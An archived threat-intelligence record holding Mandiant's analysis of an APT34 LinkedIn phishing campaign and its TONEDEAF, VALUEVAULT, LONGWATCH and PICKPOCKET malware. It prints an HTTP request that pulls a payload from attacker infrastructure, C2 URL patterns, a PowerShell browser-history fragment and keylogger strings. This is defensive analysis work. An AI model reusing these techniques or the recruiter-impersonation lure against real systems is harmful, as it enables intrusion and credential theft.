{
	"id": "07787551-db33-4524-bb5c-70b0d1391ccf",
	"created_at": "2026-04-06T00:06:42.009174Z",
	"updated_at": "2026-04-10T03:37:36.749269Z",
	"deleted_at": null,
	"sha1_hash": "087594b78ccbc96e0915734d908332cb6dfec04f",
	"title": "Hard Pass: Declining APT34's Invite to Join Their Professional Network | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 806442,
	"plain_text": "Hard Pass: Declining APT34's Invite to Join Their Professional\r\nNetwork | Mandiant\r\nBy Mandiant\r\nPublished: 2019-07-18 · Archived: 2026-04-05 19:56:47 UTC\r\nWritten by: Matt Bromiley, Noah Klapprodt, Nick Schroeder, Jessica Rocchio\r\nBackground\r\nWith increasing geopolitical tensions in the Middle East, we expect Iran to significantly increase the volume and\r\nscope of its cyber espionage campaigns. Iran has a critical need for strategic intelligence and is likely to fill this\r\ngap by conducting espionage against decision makers and key organizations that may have information that\r\nfurthers Iran's economic and national security goals. The identification of new malware and the creation of\r\nadditional infrastructure to enable such campaigns highlights the increased tempo of these operations in support of\r\nIranian interests.\r\nFireEye Identifies Phishing Campaign\r\nIn late June 2019, FireEye identified a phishing campaign conducted by APT34, an Iranian-nexus threat actor.\r\nThree key attributes caught our eye with this particular campaign:\r\n1. Masquerading as a member of Cambridge University to gain victims’ trust to open malicious documents,\r\n2. The usage of LinkedIn to deliver malicious documents,\r\n3. The addition of three new malware families to APT34’s arsenal.\r\nFireEye’s platform successfully thwarted this attempted intrusion, stopping a new malware variant dead in its\r\ntracks. Additionally, with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE),\r\nIntelligence, and Advanced Practices teams, we identified three new malware families and a reappearance of\r\nPICKPOCKET, malware exclusively observed in use by APT34. The new malware families, which we will\r\nexamine later in this post, show APT34 relying on their PowerShell development capabilities, as well as trying\r\ntheir hand at Golang.\r\nAPT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014. 
They use a mix\r\nof public and non-public tools to collect strategic information that would benefit nation-state interests pertaining\r\nto geopolitical and economic needs. APT34 aligns with elements of activity reported as OilRig and Greenbug, by\r\nvarious security researchers. This threat group has conducted broad targeting across a variety of industries\r\noperating in the Middle East; however, we believe APT34's strongest interest is gaining access to financial,\r\nenergy, and government entities.\r\nAdditional research on APT34 can be found in this FireEye blog post, this CERT-OPMD post, and this Cisco post.\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 1 of 10\n\nMandiant Managed Defense also initiated a Community Protection Event (CPE) titled “Geopolitical Spotlight:\r\nIran.” This CPE was created to ensure our customers are updated with new discoveries, activity and detection\r\nefforts related to this campaign, along with other recent activity from Iranian-nexus threat actors to include\r\nAPT33, which is mentioned in this updated FireEye blog post.\r\nIndustries Targeted\r\nThe activities observed by Managed Defense, and described in this post, were primarily targeting the following\r\nindustries:\r\nEnergy and Utilities\r\nGovernment\r\nOil and Gas\r\nUtilizing Cambridge University to Establish Trust\r\nOn June 19, 2019, Mandiant Managed Defense Security Operations Center received an exploit detection alert on\r\none of our FireEye Endpoint Security appliances. The offending application was identified as Microsoft Excel and\r\nwas stopped immediately by FireEye Endpoint Security’s ExploitGuard engine. ExploitGuard is our behavioral\r\nmonitoring, detection, and prevention capability that monitors application behavior, looking for various anomalies\r\nthat threat actors use to subvert traditional detection mechanisms. 
Offending applications can subsequently be\r\nsandboxed or terminated, preventing an exploit from reaching its next programmed step.\r\nThe Managed Defense SOC analyzed the alert and identified a malicious file named System.doc (MD5:\r\nb338baa673ac007d7af54075ea69660b), located in C:\\Users\\\\.templates. The file System.doc is a Windows\r\nPortable Executable (PE), despite having a \"doc\" file extension. FireEye identified this new malware family as\r\nTONEDEAF.\r\nA backdoor that communicates with a single command and control (C2) server using HTTP GET and POST\r\nrequests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary\r\nshell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary\r\nfiles – temp.txt and temp2.txt – within the same directory of its execution. We explore additional technical details\r\nof TONEDEAF in the malware appendix of this post.\r\nRetracing the steps preceding exploit detection, FireEye identified that System.doc was dropped by a file named\r\nERFT-Details.xls. Combining endpoint- and network-visibility, we were able to correlate that ERFT-Details.xls\r\noriginated from the URL http://www.cam-research-ac[.]com/Documents/ERFT-Details.xls. Network evidence also\r\nshowed the access of a LinkedIn message directly preceding the spreadsheet download.\r\nManaged Defense reached out to the impacted customer’s security team, who confirmed the file was received via\r\na LinkedIn message. The targeted employee conversed with \"Rebecca Watts\", allegedly employed as \"Research\r\nStaff at University of Cambridge\". The conversation with Ms. 
Watts, provided in Figure 1, began with the\r\nsolicitation of resumes for potential job opportunities.\r\nFigure 1: Screenshot of LinkedIn message asking to download TONEDEAF\r\nThis is not the first time we’ve seen APT34 utilize academia and/or job offer conversations in their various\r\ncampaigns. These conversations often take place on social media platforms, which can be an effective delivery\r\nmechanism if a targeted organization is focusing heavily on e-mail defenses to prevent intrusions.\r\nFireEye examined the original file ERFT-Details.xls, which was observed with at least two unique MD5 file\r\nhashes:\r\n96feed478c347d4b95a8224de26a1b2c\r\ncaf418cbf6a9c4e93e79d4714d5d3b87\r\nA snippet of the VBA code, provided in Figure 2, creates System.doc in the target directory from base64-encoded\r\ntext upon opening.\r\nFigure 2: Screenshot of VBA code from System.doc\r\nThe spreadsheet also creates a scheduled task named \"windows update check\" that runs the file\r\nC:\\Users\\\\.templates\\System Manager.exe every minute. Upon closing the spreadsheet, a final VBA function will\r\nrename System.doc to System Manager.exe. 
Figure 3 provides a snippet of VBA code that creates the scheduled\r\ntask, clearly obfuscated to avoid simple detection.\r\nFigure 3: Additional VBA code from System.doc\r\nUpon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over\r\nport 80.\r\nThe FireEye Footprint: Pivots and Victim Identification\r\nAfter identifying the usage of offlineearthquake[.]com as a potential C2 domain, FireEye’s Intelligence and\r\nAdvanced Practices teams performed a wider search across our global visibility. FireEye’s Advanced Practices and\r\nIntelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim\r\norganizations. Of note, FireEye discovered two additional new malware families hosted at this domain,\r\nVALUEVAULT and LONGWATCH. We also identified a variant of PICKPOCKET, a browser credential-theft\r\ntool FireEye has been tracking since May 2018, hosted on the C2.\r\nRequests to the domain offlineearthquake[.]com could take multiple forms, depending on the malware’s stage of\r\ninstallation and purpose. Additionally, during installation, the malware retrieves the system and current user\r\nnames, which are used to create a three-character “sys_id”. This value is used in subsequent requests, likely to\r\ntrack infected target activity. URLs were observed with the following structures:\r\nhxxp[://]offlineearthquake[.]com/download?id=\u0026n=000\r\nhxxp[://]offlineearthquake[.]com/upload?id=\u0026n=000\r\nhxxp[://]offlineearthquake[.]com/file//?id=\u0026h=000\r\nhxxp[://]offlineearthquake[.]com/file//?id=\u0026n=000\r\nThe first executable identified by FireEye on the C2 was WinNTProgram.exe (MD5:\r\n021a0f57fe09116a43c27e5133a57a0a), identified by FireEye as LONGWATCH. 
LONGWATCH is a keylogger\r\nthat outputs keystrokes to a log.txt file in the Windows temp folder. Further information regarding\r\nLONGWATCH is detailed in the Malware Appendix section at the end of the post.\r\nFireEye Network Security appliances also detected the following being retrieved from APT34 infrastructure\r\n(Figure 4).\r\nGET hxxp://offlineearthquake.com/file/\u003csys_id\u003e/b.exe?id=\u003c3char_redacted\u003e\u0026n=000\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)\r\nAppleWebKit/537.36 (KHTML, like Gecko)\r\nHost: offlineearthquake[.]com\r\nProxy-Connection: Keep-Alive Pragma: no-cache HTTP/1.1\r\nFigure 4: Snippet of HTTP traffic retrieving VALUEVAULT; detected by FireEye Network Security appliance\r\nFireEye identifies b.exe (MD5: 9fff498b78d9498b33e08b892148135f) as VALUEVAULT.\r\nVALUEVAULT is a Golang compiled version of the \"Windows Vault Password Dumper\" browser credential theft\r\ntool from Massimiliano Montoro, the developer of Cain \u0026 Abel.\r\nVALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view\r\nthe credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to\r\nextract browser history in order to match browser passwords with visited sites. Further information regarding\r\nVALUEVAULT can be found in the appendix below.\r\nFurther pivoting from FireEye appliances and internal data sources yielded two additional files, PE86.dll (MD5:\r\nd8abe843db508048b4d4db748f92a103) and PE64.dll (MD5: 6eca9c2b7cf12c247032aae28419319e). 
These files\r\nwere analyzed and determined to be 64- and 32-bit variants of the malware PICKPOCKET, respectively.\r\nPICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and\r\nInternet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to\r\ndate, solely utilized by APT34.\r\nConclusion\r\nThe activity described in this blog post presented a well-known Iranian threat actor utilizing their tried-and-true\r\ntechniques to breach targeted organizations. Luckily, with FireEye’s platform in place, our Managed Defense\r\ncustomers were not impacted. Furthermore, upon the blocking of this activity, FireEye was able to expand upon\r\nthe observed indicators to identify a broader campaign, as well as the use of new and old malware.\r\nWe suspect this will not be the last time APT34 brings new tools to the table. Threat actors are often reshaping\r\ntheir TTPs to evade detection mechanisms, especially if the target is highly desired. For these reasons, we\r\nrecommend organizations remain vigilant in their defenses, and remember to view their environment holistically\r\nwhen it comes to information security.\r\nLearn more about Mandiant Managed Defense, and catch an on-demand recap on this and the Top 5 Managed\r\nDefense attacks this year.\r\nMalware Appendix\r\nTONEDEAF\r\nTONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS.\r\nSupported commands include system information collection, file upload, file download, and arbitrary shell\r\ncommand execution. Although this backdoor was coded to be able to communicate with DNS requests to the hard-coded Command and Control server, c[.]cdn-edge-akamai[.]com, it was not configured to use this functionality.\r\nFigure 5 provides a snippet of the assembly CALL instruction of dns_exfil. 
The creator likely made this as a\r\nmeans for future DNS exfiltration as a plan B.\r\nFigure 5: Snippet of code from TONEDEAF binary\r\nAside from not being enabled in this sample, the DNS tunneling functionality also contains missing values and\r\nbugs that prevent it from executing properly. One such bug involves determining the length of a command\r\nresponse string without accounting for Unicode strings. As a result, a single command response byte is sent when,\r\nfor example, the malware executes a shell command that returns Unicode output. Additionally, within the\r\nmalware, an unused string contained the address 185[.]15[.]247[.]154.\r\nVALUEVAULT\r\nVALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft\r\ntool from Massimiliano Montoro, the developer of Cain \u0026 Abel.\r\nVALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view\r\nthe credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to\r\nextract browser history in order to match browser passwords with visited sites. A snippet of this function is shown\r\nin Figure 6.\r\npowershell.exe /c \"function get-iehistory {. [CmdletBinding()]. param (). . $shell = New-Object -ComObject Shel\r\nFigure 6: Snippet of PowerShell code from VALUEVAULT to extract browser credentials\r\nUpon execution, VALUEVAULT creates a SQLITE database file in the AppData\\Roaming directory under the\r\ncontext of the user account it was executed by. This file is named fsociety.dat and VALUEVAULT will write the\r\ndumped passwords to this in SQL format. This functionality is not in the original version of the “Windows Vault\r\nPassword Dumper”. 
Figure 7 shows the SQL format of the fsociety.dat file.\r\nFigure 7: SQL format of the VALUEVAULT fsociety.dat SQLite database\r\nVALUEVAULT’s function names are not obfuscated and are directly reviewable in strings analysis. Other\r\ndeveloper environment variables were directly available within the binary as shown below. VALUEVAULT does\r\nnot possess the ability to perform network communication, meaning the operators would need to manually retrieve\r\nthe captured output of the tool.\r\nC:/Users/\u003credacted\u003e/Desktop/projects/go/src/browsers-password-cracker/new_edge.go\r\nC:/Users/\u003credacted\u003e/Desktop/projects/go/src/browsers-password-cracker/mozila.go\r\nC:/Users/\u003credacted\u003e/Desktop/projects/go/src/browsers-password-cracker/main.go\r\nC:/Users/\u003credacted\u003e/Desktop/projects/go/src/browsers-password-cracker/ie.go\r\nC:/Users/\u003credacted\u003e/Desktop/projects/go/src/browsers-password-cracker/Chrome Password Recovery.go\r\nFigure 8: Golang files extracted during execution of VALUEVAULT\r\nLONGWATCH\r\nFireEye identified the binary WinNTProgram.exe (MD5:021a0f57fe09116a43c27e5133a57a0a) hosted on the\r\nmalicious domain offlineearthquake[.]com. FireEye identifies this malware as LONGWATCH. 
The primary\r\nfunction of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.\r\nInteresting strings identified in the binary are shown in Figure 9.\r\nGetAsyncKeyState\r\n\u003e---------------------------------------------------\\n\\n\r\nc:\\\\windows\\\\temp\\\\log.txt\r\n[ENTER]\r\n[CapsLock]\r\n[CRTL]\r\n[PAGE_UP]\r\n[PAGE_DOWN]\r\n[HOME]\r\n[LEFT]\r\n[RIGHT]\r\n[DOWN]\r\n[PRINT]\r\n[PRINT SCREEN] (1 space)\r\n[INSERT]\r\n[SLEEP]\r\n[PAUSE]\r\n\\n---------------CLIPBOARD------------\\n\r\n\\n\\n \u003e\u003e\u003e (2 spaces)\r\nc:\\\\windows\\\\temp\\\\log.txt\r\nFigure 9: Strings identified in a LONGWATCH binary\r\nDetecting the Techniques\r\nFireEye detects this activity across our platforms, including named detection for TONEDEAF, VALUEVAULT,\r\nand LONGWATCH. Table 1 contains several specific detection names that provide an indication of APT34\r\nactivity.\r\nSignature Name\r\nFE_APT_Keylogger_Win_LONGWATCH_1\r\nFE_APT_Keylogger_Win_LONGWATCH_2\r\nFE_APT_Keylogger_Win32_LONGWATCH_1\r\nFE_APT_HackTool_Win_PICKPOCKET_1\r\nFE_APT_Trojan_Win32_VALUEVAULT_1\r\nFE_APT_Backdoor_Win32_TONEDEAF\r\nTONEDEAF BACKDOOR [DNS]\r\nTONEDEAF BACKDOOR [upload]\r\nTONEDEAF BACKDOOR [URI]\r\nTable 1: FireEye Platform Detections\r\nEndpoint Indicators\r\nIndicator MD5 Hash (if applicable) Code Family\r\nSystem.doc b338baa673ac007d7af54075ea69660b TONEDEAF\r\n  50fb09d53c856dcd0782e1470eaeae35 TONEDEAF\r\nERFT-Details.xls 96feed478c347d4b95a8224de26a1b2c TONEDEAF DROPPER\r\n  caf418cbf6a9c4e93e79d4714d5d3b87 TONEDEAF DROPPER\r\nb.exe 9fff498b78d9498b33e08b892148135f VALUEVAULT\r\nWindowsNTProgram.exe 021a0f57fe09116a43c27e5133a57a0a 
LONGWATCH\r\nPE86.dll d8abe843db508048b4d4db748f92a103 PICKPOCKET\r\nPE64.dll 6eca9c2b7cf12c247032aae28419319e PICKPOCKET\r\nTable 2: APT34 Endpoint Indicators from this blog post\r\nNetwork Indicators\r\nhxxp[://]www[.]cam-research-ac[.]com\r\nofflineearthquake[.]com\r\nc[.]cdn-edge-akamai[.]com\r\n185[.]15[.]247[.]154\r\nAcknowledgements\r\nA huge thanks to Delyan Vasilev and Alex Lanstein for their efforts in detecting, analyzing and classifying this\r\nAPT34 campaign. Thanks to Matt Williams, Carlos Garcia and Matt Haigh from the FLARE team for the in-depth\r\nmalware analysis.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
	],
	"report_names": [
		"hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
	],
	"threat_actors": [
		{
			"id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4",
			"created_at": "2022-10-25T15:50:23.458833Z",
			"updated_at": "2026-04-10T02:00:05.419537Z",
			"deleted_at": null,
			"main_name": "APT34",
			"aliases": null,
			"source_name": "MITRE:APT34",
			"tools": [
				"netstat",
				"Systeminfo",
				"PsExec",
				"SEASHARPEE",
				"Tasklist",
				"Mimikatz",
				"POWRUNER",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a63c994f-d7d6-4850-a881-730635798b90",
			"created_at": "2025-08-07T02:03:24.788883Z",
			"updated_at": "2026-04-10T02:00:03.785146Z",
			"deleted_at": null,
			"main_name": "COBALT TRINITY",
			"aliases": [
				"APT33 ",
				"Elfin ",
				"HOLMIUM ",
				"MAGNALIUM ",
				"Peach Sandstorm ",
				"Refined Kitten ",
				"TA451 "
			],
			"source_name": "Secureworks:COBALT TRINITY",
			"tools": [
				"AutoCore",
				"Cadlotcorg",
				"Dello RAT",
				"FalseFont",
				"Imminent Monitor",
				"KDALogger",
				"Koadic",
				"NanoCore",
				"NetWire",
				"POWERTON",
				"PoshC2",
				"Poylog",
				"PupyRAT",
				"Schoolbag"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e58deb93-aff1-4be5-8deb-37fe8af0b7ed",
			"created_at": "2022-10-25T16:07:23.918534Z",
			"updated_at": "2026-04-10T02:00:04.789509Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [
				"Greenbug",
				"Volatile Kitten"
			],
			"source_name": "ETDA:Greenbug",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "25896473-161f-411f-b76a-f11bb26c96bd",
			"created_at": "2023-01-06T13:46:38.75749Z",
			"updated_at": "2026-04-10T02:00:03.090307Z",
			"deleted_at": null,
			"main_name": "CHRYSENE",
			"aliases": [
				"Greenbug"
			],
			"source_name": "MISPGALAXY:CHRYSENE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e5ff825b-0456-4013-b90a-971b93def74a",
			"created_at": "2022-10-25T15:50:23.824058Z",
			"updated_at": "2026-04-10T02:00:05.377261Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"APT33",
				"HOLMIUM",
				"Elfin",
				"Peach Sandstorm"
			],
			"source_name": "MITRE:APT33",
			"tools": [
				"PowerSploit",
				"AutoIt backdoor",
				"PoshC2",
				"Mimikatz",
				"NanoCore",
				"DEADWOOD",
				"StoneDrill",
				"POWERTON",
				"LaZagne",
				"TURNEDUP",
				"NETWIRE",
				"Pupy",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b",
			"created_at": "2025-08-07T02:03:24.722093Z",
			"updated_at": "2026-04-10T02:00:03.681914Z",
			"deleted_at": null,
			"main_name": "COBALT EDGEWATER",
			"aliases": [
				"APT34 ",
				"Cold River ",
				"DNSpionage "
			],
			"source_name": "Secureworks:COBALT EDGEWATER",
			"tools": [
				"AgentDrable",
				"DNSpionage",
				"Karkoff",
				"MailDropper",
				"SideTwist",
				"TWOTONE"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f",
			"created_at": "2023-01-06T13:46:38.367369Z",
			"updated_at": "2026-04-10T02:00:02.945356Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"Elfin",
				"MAGNALLIUM",
				"HOLMIUM",
				"COBALT TRINITY",
				"G0064",
				"ATK35",
				"Peach Sandstorm",
				"TA451",
				"APT 33",
				"Refined Kitten"
			],
			"source_name": "MISPGALAXY:APT33",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6bba8e81-73af-4010-86dc-d43c408ca342",
			"created_at": "2023-01-06T13:46:38.553459Z",
			"updated_at": "2026-04-10T02:00:03.021597Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [],
			"source_name": "MISPGALAXY:Greenbug",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434002,
	"ts_updated_at": 1775792256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/087594b78ccbc96e0915734d908332cb6dfec04f.pdf",
		"text": "https://archive.orkl.eu/087594b78ccbc96e0915734d908332cb6dfec04f.txt",
		"img": "https://archive.orkl.eu/087594b78ccbc96e0915734d908332cb6dfec04f.jpg"
	}
}